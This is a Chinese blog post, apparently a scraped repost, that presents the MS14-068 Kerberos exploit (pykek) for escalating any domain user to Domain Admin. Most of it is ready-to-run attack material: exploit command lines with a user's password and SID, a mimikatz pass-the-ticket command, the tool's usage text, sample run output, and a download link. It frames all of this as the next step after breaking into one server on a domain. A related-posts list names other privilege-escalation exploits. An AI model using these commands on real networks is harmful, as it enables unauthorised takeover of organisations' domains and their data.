2. 程式人生 > 實用技巧 >域內提權神器 MS14-068 完整EXP

域內提權神器 MS14-068 完整EXP

阿新 發佈:2020-10-12

提權:

會提權的兄弟應該都知道 域的許可權是整個區域網最高統治權 當我們拿下一臺伺服器 只是域下的一臺機器 這時候 就會想盡辦法 拿下域控制伺服器

不知道的可看本部落格之前做的教程

可以讓任何域內使用者提升為域管理員

使用命令:

c:\python27\python.exe ms14-068.py -u [email protected] -p [email protected]# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.local
mimikatz.exe “kerberos::ptc [email protected]

” exit

在這裡插入圖片描述
在這裡插入圖片描述
ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513)

Domain Admins (512)

Schema Admins (518)

Enterprise Admins (519)

Group Policy Creator Owners (520)

USAGE:

ms14-068.py -u @ -s -d

OPTIONS:

-p

–rc4

Example usage :

Linux (tested with samba and MIT Kerberos)

[email protected]:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

Password:

[+] Building AS-REQ for dc-a-2003.dom-a.loc… Done!

[+] Sending AS-REQ to dc-a-2003.dom-a.loc… Done!

[+] Receiving AS-REP from dc-a-2003.dom-a.loc… Done!

[+] Parsing AS-REP from dc-a-2003.dom-a.loc… Done!

[+] Building TGS-REQ for dc-a-2003.dom-a.loc… Done!

[+] Sending TGS-REQ to dc-a-2003.dom-a.loc… Done!

[+] Receiving TGS-REP from dc-a-2003.dom-a.loc… Done!

[+] Parsing TGS-REP from dc-a-2003.dom-a.loc… Done!

[+] Creating ccache file ‘[email protected]’… Done!

[email protected]:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0

On Windows

python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

mimikatz.exe “kerberos::ptc [email protected]” exit`

下載地址

https://github.com/bidord/pykek

相關推薦

神器 MS14-068 完整EXP

: 會的兄弟應該都知道 的許可權是整個區域網最高統治權 當我們拿下一臺伺服器 只是下的一臺機器 這時候 就會想盡辦法 拿下控制伺服器

Ladon外掛-CVE-2020-1472漏洞EXP

漏洞簡述 2020年08月12日, 360CERT監測發現Windows官方 釋出了 NetLogon 特權提升漏洞 的風險通告,該漏洞編號為 CVE-2020-1472,漏洞等級:嚴重,漏洞評分:10分。

滲透】利用S4U2self

一、利用場景 當獲取域內機器許可權,許可權為iis、Network Service等許可權,就可以利用S4u2Self進行許可權提升,儘管要在帳戶上專門啟用約束委派才能使用S4U2proxy 跨系統“使其工作”,但任何具有 SPN 的主體都可

針對神器Sherlock的分析與利用

01 Sherlock簡介 Sherlock是一個在Windows下用於本地的PowerShell指令碼。 目前包含了以下漏洞:

CVE-2019-13272 核心漏洞手記

poc: github kernel-bug-summary: blog 中文簡述:嘶吼 CVE: CVE-2019-13272 要點 簡單總結:即利用併發條件下,子程式在獲取父程式的同時,父程式的憑證得以切換至root來使得子程式同時獲得root許可權。

windows

schtasks命令使用 schtasks命令比at命令更靈活。而且在Windows Vista、Windows Server 2008及之後版本的作業系統已經棄用at命令。建立一個名稱為\"test\"的計劃任務,啟動許可權為system

[總結]Windows總結

0x01 簡介 可分為縱向與橫向:縱向:低許可權角色獲得高許可權角色的許可權;橫向:獲取同級別角色的許可權。

Kali虛擬機器利用msf17-010執行RCE(針對Windows Server 2008以及2003)

寫在前面: 老師上課的演示是利用了ms17-010的exploit/windows/smb/ms17_010_enternalblue,我們可以通過use exploit/windows/smb/ms17_010_enternalblue再info檢視適用於什麼版本,否則拿這個去攻擊Windows Server 2

記一次WindowsServer2012 - 爛土豆

Emm Shell都好久了 操 最近好鐵鐵又喊我來 因為自己不怎麼會,最近學了一點 放了學就回家抓緊吃完飯開始

MS16-032 windows本地

試用系統:Tested on x32 Win7,x64 Win8,x64 2k12R2 powershell指令碼: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

橫向

0x01 常見windows遠端連線和命令 1、IPC net use \\\\192.168.0.100\\IPC$ "password" /user:administrator

Windows Win32k 許可權漏洞

0X01  簡介:   本篇文章將集中介紹兩個利用windows win32k服務的漏洞。

Mysql UDF方法

0x01 UDF UDF(user defined function)使用者自定義函式,是mysql的一個拓展介面。使用者可以通過自定義函式實現在mysql中無法方便實現的功能,其新增的新函式都可以在sql語句中呼叫,就像呼叫本機函式一樣。

metaspolit下UAC以及日誌清除

在獲得webshell時但許可權不夠大,這時候為了完全獲得受害者機器的許可權,使用msf進行後滲透。

(CVE-2015-1328)Ubuntu Linux核心本地漏洞

(CVE-2015-1328)Ubuntu Linux核心本地漏洞 一、漏洞簡介 本地普通使用者可以利用該漏洞在敏感系統目錄中建立新檔案或讀取敏感檔案內容,從而提升到管理員許可權。

以及反彈shell一些方法

以及反彈shell netcat反彈shell kali中使用nc(netcat)進行監聽 用法 : nv -lvvp 2333(埠號)

第十三章 使用者組的管理,使用者許可權,sudo

使用者組的管理 基本組-g#每個使用者只能有一個基本組 附加組-G#使用者可以有多個附加組​跟組相關的檔案 [root@lxy ~]# ll/etc/group-rw-r--r--. 1 root root 771 Dec 15 00:58 /etc/group[root@lxy ~]# ll /etc/g

〖教程〗LadonMS16-135引數版(WIN7-2016)

漏洞名稱 Win32k 特權提升漏洞(MS16-135)(CVE-2016-7255) 漏洞等級 高危 漏洞型別 本地

20200811記錄:ansible sudo,劇本,變數資訊

--------- 1 案例1:配置sudo許可權 1.1 問題 本案例要求使用sudo提升普通使用者的許可權,要求如下:

DC-3靶機滲透

0x01收集DC-3靶機的資訊 利用nmap工具掃描DC-3的資訊 利用msf工具掃描出對應的版本資訊